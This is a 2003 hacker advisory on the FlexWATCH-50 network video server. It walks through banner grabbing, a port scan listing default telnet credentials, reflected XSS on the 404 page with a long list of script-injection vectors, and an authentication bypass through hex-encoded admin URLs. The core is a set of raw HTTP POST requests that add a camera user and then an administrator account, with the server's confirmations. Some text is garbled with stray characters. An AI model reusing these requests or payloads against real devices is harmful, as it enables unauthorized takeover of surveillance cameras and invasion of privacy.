#=============================================================
# Unauthorized Access vulnerability in FlexWATCH camera Server
# Second Assault !
#=============================================================
Author: SLAIZER
mail: slaizer[at]phreaker.net
Vendor : SEYEON Technology
System : FlexWATCH Network Video Server
url : http://www.flexwatch.com/
Mail: sytech@seyeon.co.kr
Protuct Version : FlexWATCH-50 Web Ver 2.2 tested Build Nov 18 2003
#====================
# Introduction
#====================
A few months ago I published another document , explaining how to obtain entire access
to the system of easy and fast form.
The same document was sent to SEYEON before being published , since I did not obtain
response of them , I decided to publish it. Two months after having being published ,
SEYEON got in touch with me. They asked me that test a new system already patched to
the bug , in order that I was saying to them that bugs had found .
They demanded me that it should remove the name of the company of my previus document
and thet he should not publish any more...
In addition to realizing a work to the company with many economic benefits of completely
free form , thing that I do not accept . I will always be ready to help to whom I needed
it from free form where as I'm not demanded anything and much less I use propietary
software. I'm sorry that it seems to be exagerate but nobody lives of the air.
#===================
# Description
#===================
愁o examining the new system!
slaizer@Necora:~$ echo -e "HEAD / HTTP/1.0\n\n" | nc victim 80
HTTP/1.0 302 Redirect
Server: FlexWATCH-Webs <---------- :) the same everlasting banner
Date: Mon Dec 1 01:01:26 2003
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://victim/index.htm
Age: 1
弒n another version do not examine the services use , becouse I did not need it :P.
root@Necora:~$ nmap -sS -P0 victim
Interesting ports on victim (censured :P):
PORT STATE SERVICE
21/tcp open ftp <-------
23/tcp open telnet <------- Default user/pass are root/root :P
80/tcp open http <------- They are not also very interesting right now ,
1024/tcp open kdm <------- but with the nice thing that is to use ssl :P.
1755/tcp open wms <-------
弒t's time to see web application :
惹ailing along the web we think that the system has changed a bit as for the tree of
directories , but for the rest it seems to be equal .
The first thing what we meet is a bug in the application entrusted to notify to us
that url to which we eant to accede doesn't exist ( 404 error ) , a piece of XSS :P .
Cross-Site Scripting .
Example :
mozilla http://victim/hehe.html<H1><script>alert('Security?');</script>
Results :
Access Error: Page not found
when trying to obtain /hehe.html
cannot open URL /hehe.html
( The code is executed perfectly even two times are executed .. hehe . Turning out
be of that time two windows alerting us with the message -Security ? ).
View source :
<html>
<head>
<title>Document Error: Page not found</title>
</head>
<body>
<h2>Access Error: Page not found</h2>
when trying to obtain <b>/hehe.html<h1><script>alert('Security ?');</script></b>
<br><p>Cannot open URL <b>/hehe.html<h1><script>alert('Security ?');</script></b></p>
</body>
</html>
Note:
This type of methods is well-known to gain access to the system by means of links malicious
to do with the identification of some user .
document.write / document.cookie / document.location..
I expose different methods of injection Javascript extracted of Globbes Security Advisory #33:
<a href="javascript#[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]"> [IE]
<input type="image" dynsrc="javascript:[code]"> [IE]
<bgsound src="javascript:[code]"> [IE]
&<script>[code]</script>
&{[code]}; [N4]
<img src=&{[code]};> [N4]
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]"> [IE]
<img src="mocha:[code]"> [N4]
<img src="livescript:[code]"> [N4]
<a href="about:<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">
<div style="background-image: url(javascript:[code]);">
<div style="behaviour: url([link to code]);"> [IE]
<div style="binding: url([link to code]);"> [Mozilla]
<div style="width: expression([code]);"> [IE]
<style type="text/javascript">[code]</style> [N4]
<object classid="clsid:..." codebase="javascript:[code]"> [IE]
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- -- --><script>[code]</script><!-- -- -->
<script>[code]</script>
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml id="X"><a><b><script>[code]</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]
愁here has always to be verified the information that the client sends to the Servant , in this
case the most obvius serious solution to verify that malicious characters are not inserted
as for example substituing to their html equivalent.
------------ u0xa ---------------
嫂t the moment where I want to come it's to this url : admin/aindex.htm .
That is where one finds the system-administration , so trying and using
imagination I verify that it happens on having sent the request in hexadecimal format.
Example :
slaizer@Necora:~$ ./urlhex.pl http://victim/admin/aindex.htm
------------ Url encode to hex mode ----------------
http://victim/%61%64m%69n/a%69nde%78.%68t%6D
-----------------By SLAIZER tools ------------------
I obtain this in text plain :
------ code -----
<html>
<head>
<script language="Javascript">
onBlur=self.focus()
</script>
<frameset cols="196,*" framespacing="0" frameborder="0">
<frame src="admin.htm" name="menu_frame" id="menu_frame" scrolling="Auto" marginwidth="0" marginheight="0">
<frame src="videocfg.htm" name="main_frame" id="tool_frame" scrolling="Auto" marginwidth="10" marginheight="0">
</frameset>
</head>
</html>
----- code -----
:D It's my friend the frame of configuracion and it's in plain text ..
We go for good way we are going to look if we can do something with this.
slaizer@Necora:~$ ./urlhex.pl http://victim/admin/admin.htm
------------ Url encode to hex mode ----------------
http://victim/adm%69%6E/%61%64%6D%69n.%68tm
-----------------By SLAIZER tools ------------------
Here it is where we go away to centre , so we are going to see it!.
Important links :
_______________________
|-Change Root | <---- /asp/pwdcfg.asp
|Password configuration |
| |
|-Add User | <---- /asp/adduser.asp /* Let's go! */
| |
|-Delete User | <---- /asp/deluser.asp
| |
|-Access Level | <---- /asp/chglimit.asp
|_______________________|
slaizer@Necora:~$ nc victim 80
POST /goform/AddUser HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://victim/adm%69n/a%73%70/a%64duser.%61%73p <----/*This is a /admin/asp/adduser.asp hex-encoded*/
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)
Host: victim
Content-Length: 152
Pragma: no-cache
RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=slaizer&password=root123
&passconf=root123&group=POWER_USER&enabled=on&ok=OK
----------- u0xa ------------
<br>User, "slaizer" is successfully added.<br><br>User configuration is successfully saved.<br></font></b>
----------- u0xa ------------
It seems that there is post correctly , but on having tried login shows us this error directly :
Access Error: Forbidden
When trying to obtain /admin/aindex.htm
Access Denied Prohibited User .
-------------------------------
foh....but ... I login in :
http://victim/app/idxas.html <----- Camera Administration.
Login : slaizer
password: root123
|o_O| <-hehe !! We already have access to all Cameras!!! using the login slaizer with pass root123
that we add in the previous setp. We have already given a great steo improve..
But...The solution is simpler than seems.. the added user belongs to POWER_USER , earlier
having this user really more sufficient , but it is enought to us to done one more test but
add another user to the group of ADMIN :
Example
slaizer@Necora:~$ nc victim 80
POST /goform/AddUser HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://victim/adm%69n/a%73%70/a%64duser.%61%73p <----/*This is a /admin/asp/adduser.asp hex-encoded*/
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)
Host: victim
Content-Length: 147
Pragma: no-cache
RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=rezials&password=123root
&passconf=123root&group=ADMIN&enabled=on&ok=OK
----------- u0xa ------------
<br>User, "rezials" is successfully added.<br><br>User configuration is successfully saved.<br></font></b>
----------- u0xa ------------
At the moment ok! .
I use login rezials & password 123root and..... :D Congratulations! you Are ADMIN!!!
You can already do what you want in the system!!!
The problem was becouse the directory /admin was already not allowin him access to the users as previously
it was happening.
#=========================
# Solution :
#=========================
Always verify the type of request that the client realizes, since you can see I have used a miscellany of
code hexadeciaml and ascii .
The best solution is to create meetings of identification and to allow the access to such directories for
the meeting.
/* Note : login in www.flexwatch.com as technic e-mail suport... xD */
#========================
# GreetSssSss!!!
#========================
- gyorgyo - Makensi - palako - overpower - zapper - sha0 - IaM - phiber - kanutron - TaYoKeN - plAnadeCu -
- kicat - AbeToRiuS - M0RGAN - ZeroQ ...........! xD
[[Irc-Hispano : #boinasnegras , #ngsec]]